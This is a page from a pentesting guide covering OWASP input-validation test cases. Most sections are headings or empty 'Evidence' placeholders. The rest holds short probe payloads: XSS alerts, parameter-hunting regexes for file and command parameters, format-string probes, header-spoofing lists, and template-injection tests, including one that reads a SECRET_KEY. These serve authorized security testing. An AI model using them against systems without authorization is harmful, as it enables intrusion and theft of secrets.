The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • â„šī¸0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • đŸ•ĩī¸HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • đŸ’Ŗ2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • đŸŽŖGophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • đŸ‘ŋ3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Input Validation Testing
  • 4.7.1 Testing for Reflected Cross Site Scripting
  • 4.7.2 Testing for Stored Cross Site Scripting
  • 4.7.3 Testing for HTTP Verb Tampering
  • 4.7.4 Testing for HTTP Parameter Pollution
  • 4.7.5 Testing for SQL Injection
  • 4.7.6 Testing for LDAP Injection
  • 4.7.7 Testing for XML Injection
  • 4.7.8 Testing for SSI Injection
  • 4.7.9 Testing for XPath Injection
  • 4.7.10 Testing for IMAP SMTP Injection
  • 4.7.11 Testing for Code Injection
  • 4.7.12 Testing for Command Injection
  • 4.7.13 Testing for Format String Injection
  • 4.7.14 Testing for Incubated Vulnerability
  • 4.7.15 Testing for HTTP Splitting Smuggling
  • 4.7.16 Testing for HTTP Incoming Requests
  • 4.7.17 Testing for Host Header Injection
  • 4.7.18 Testing for Server-side Template Injection
  • 4.7.19 Testing for Server-Side Request Forgery
  1. Web (OWASP Test cases)

4.7 Input Validation Testing

Last updated 5 months ago

4.7.1

(?:\?|&)(\w+)=
"><img src=1 onerror=alert(1)>
<script>alert(2)</script>"<

Evidence:

​

4.7.2

You can use the previous payloads.

Evidence:

​

Evidence:

​

The results should be that the application takes the both parameters instead of only one of them.

Evidence:

​

Evidence:

​

Evidence:

​

Evidence:

​

Evidence:

​

Evidence:

​

Evidence:

​
[?&](file|filepath|filename|dir|folder|download|upload|doc|image|path|include|view|resource|asset|content|icon|logfile)=
  • Website/URL Access Parameters

[?&](url|link|redirect|target|site|page|navigate|ref|callback|host|return|next)=
  • UNIX FI & Windows FI

Evidence:

​
[?&](cmd|exec|action|run|query|operation|execute|task|process|shell|module|method|command|do)=

Evidence:

​
alice
%s%s%s%n
%p%p%p%p%p
{event.__init__.__globals__[CONFIG][SECRET_KEY]}

Evidence:

​

Evidence:

​

Evidence:

​

Evidence:

​
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-IP: 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Host: 127.0.0.1
X-HTTP-Host-Override: 127.0.0.1
X-Client: 127.0.0.1
X-Host: 127.0.0.1

Evidence:

​
a{{7*7}}b
a{{7*7}}
{7*7} 
${7*7} 
{{7*7}} 
<% 7*7 %> 
[% 7*7 %]

Evidence:

​

Evidence:

​

4.7.3

This section has been merged into:

4.7.4

4.7.5

& .

4.7.6

.

4.7.7

Try to exploit .

4.7.8

4.7.9

4.7.10

4.7.11

4.7.12

&

4.7.13

4.7.14

4.7.15

4.7.16

4.7.17

of the Host header in different endpoints on the application.

4.7.18

4.7.19

Input Validation Testing
Testing for Reflected Cross Site Scripting
Testing for Stored Cross Site Scripting
Testing for HTTP Verb Tampering
Test HTTP Methods
Testing for HTTP Parameter Pollution
Testing for SQL Injection
SQL wordlist
NoSQL Payloads
Testing for LDAP Injection
LDAP Wordlist
Testing for XML Injection
XXE vulnerabilities
Testing for SSI Injection
Testing for XPath Injection
Testing for IMAP SMTP Injection
Testing for Code Injection
Testing for Command Injection
Windows RCE
UNIX RCE
Testing for Format String Injection
Testing for Incubated Vulnerability
Testing for HTTP Splitting Smuggling
CT.TE.
TE.CL.
TE.TE.
Testing for HTTP Incoming Requests
Testing for Host Header Injection
Modify the value
Testing for Server-side Template Injection
Testing for Server-Side Request Forgery